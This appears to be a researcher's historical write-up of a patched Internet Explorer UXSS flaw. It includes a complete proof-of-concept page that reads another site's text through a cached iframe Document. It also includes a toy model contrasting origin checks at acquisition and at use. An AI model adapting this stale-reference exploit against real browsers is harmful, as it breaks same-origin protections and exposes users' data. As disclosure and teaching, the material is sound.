Earlier UXSS variants using cached iframe documents required reloading the main page and using window.opener as the storage mechanism. I was looking for a simpler version and found one: by caching the Document object of an SWF-loaded iframe directly in a local variable (no opener, no reload), then navigating the iframe to about:blank and redirecting the cached document’s parentWindow to a target URL, I could read that page’s content. The approach is more direct and harder to detect because it leaves fewer observable side effects.

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>xDom_Variation_Simplification_WOOBR_977211</title></head>
<body>
<font face="Tahoma" size="2">
<center><h2>xDom_Variation_Simplification_WOOBR_977211</h2></center>
<center>
<input type="button" value="Do It!" onclick="loadItTwice()"><br />
(And wait 5 seconds because we have to load the swf inside the IFRAME, cache its <b>D</b>ocument, change the URL to Google, wait, and read its body.innerText.) <br /><br />
This version is much simpler because it does not use the opener and there's no reloading of the main page.<br /><br />
<font color="red">If you receive an error, just ignore it. It's the focus() that Google does to its INPUT, but because it's hidden, IE throws an error.</font>
</center>
<hr />
1) Load any <font color="blue"><b>swf</b></font> inside an IFRAME.<br />

<font color="red">window[0]</font>.location.replace('<font color="blue">empty.swf</font>');<br /><br />

2) Cache the <font color="blue"><b>D</b></font>ocument of the IFRAME in the <b>cachedDocument</b> variable.<br />
<font color="blue">cachedDocument</font> = document.all.flashContainer.<font color="blue"><b>D</b></font>ocument;<br /><br />
3) Change the URL of the IFRAME.<br />
window[0].location = "<font color="blue">about:blank</font>";<br /><br />

4) Change location of the cached <font color="blue"><b>D</b></font>ocument to the desired URL/Domain.<br />
<font color="blue"><b>cachedDocument</b>.parentWindow.location</font> = 'http://www.google.com';<br /><br />

5) Read the cached <font color="blue"><b>D</b></font>ocument at will.<br />
alert(<font color="blue"><b>cachedDocument</b>.body.innerText</font>);<br /><br />

<hr />
<br />
<center>
	<iframe id="flashContainer" width="100" height="100"></iframe>
</center>
</font>


<script language="JavaScript">
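var cachedDocument; // holds the Document reference across the IFRAME navigations
function loadItTwice()
{
	// Step 1: load the SWF inside the IFRAME.
	window[0].location.replace('empty.swf');

	// Steps 2 and 3 (after 500 ms): cache the IFRAME's Document, then navigate the IFRAME to about:blank.
	setTimeout('cachedDocument = document.all.flashContainer.Document; window[0].location = "about:blank";', 500);

	// Step 4 (after 1 second): point the cached Document's parentWindow at the target URL.
	setTimeout('cachedDocument.parentWindow.location = "http://www.google.com";', 1000);

	// Step 5 (after 5 seconds): read the loaded page's text through the cached reference.
	setTimeout('alert("This is the innerText of Google:\\n\\n" + cachedDocument.body.innerText)', 5000);
}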
</script>
</body>
</html>

This variation distills the UXSS technique to its minimum. The Document of an SWF-loaded iframe is cached into a local variable before the iframe is navigated away. Pointing cachedDocument.parentWindow.location to any target URL causes that URL to load in the ghost iframe context, but since the cachedDocument reference bypasses the same-origin check (it was acquired before the navigation), reading cachedDocument.body.innerText five seconds later returns the full text of the target page. No page reload and no window.opener manipulation are needed — just a single local variable holding a stale document reference.
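The flaw described above is a gap between when the same-origin check is made and when the reference is used. As an added illustration (not code from the original page, and not how Internet Explorer is implemented), the toy JavaScript model below replays the five steps against a handle that checks origin only when acquired and against one that re-checks on every read. All class names, origins and strings are constructed.

```javascript
// Toy model constructed for illustration. Class and function names are
// hypothetical; this is not Internet Explorer's actual implementation.
class Frame {
  constructor(origin, text) { this.origin = origin; this.text = text; }
  navigate(origin, text) { this.origin = origin; this.text = text; }
}

// Flawed handle: the same-origin decision is made once, when script obtains
// the reference, and is never revisited.
class CheckAtAcquireHandle {
  constructor(frame, callerOrigin) {
    if (frame.origin !== callerOrigin) throw new Error('access denied');
    this.frame = frame;
    this.caller = callerOrigin;
  }
  // Navigating through the handle is allowed; only reads are sensitive.
  set location(dest) { this.frame.navigate(dest.origin, dest.text); }
  get innerText() { return this.frame.text; } // no re-check at time of use
}

// Hardened handle: each read compares the caller with the origin the frame
// holds now, so a stale reference stops working after navigation.
class CheckAtUseHandle extends CheckAtAcquireHandle {
  get innerText() {
    if (this.frame.origin !== this.caller) throw new Error('access denied');
    return this.frame.text;
  }
}

// Replays the page's five steps against the model; all values are constructed.
function replay(Handle) {
  const embedder = 'http://embedder.example';
  const frame = new Frame(embedder, 'empty.swf');   // 1) same-origin SWF in the frame
  const cached = new Handle(frame, embedder);       // 2) cache the document reference
  frame.navigate(embedder, '');                     // 3) about:blank, still the embedder's origin
  cached.location = { origin: 'http://target.example', text: 'target page text' }; // 4)
  try { return cached.innerText; }                  // 5) read through the cached reference
  catch (e) { return e.message; }
}

console.log('check at acquire:', replay(CheckAtAcquireHandle));
console.log('check at use:    ', replay(CheckAtUseHandle));
```

The first line of output shows the cross-origin text leaking through the cached reference; the second shows the same sequence refused once the check runs at read time.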

Found during my years at Microsoft (2006–2014). These bugs were patched long ago — shared here as a historical record for learning purposes.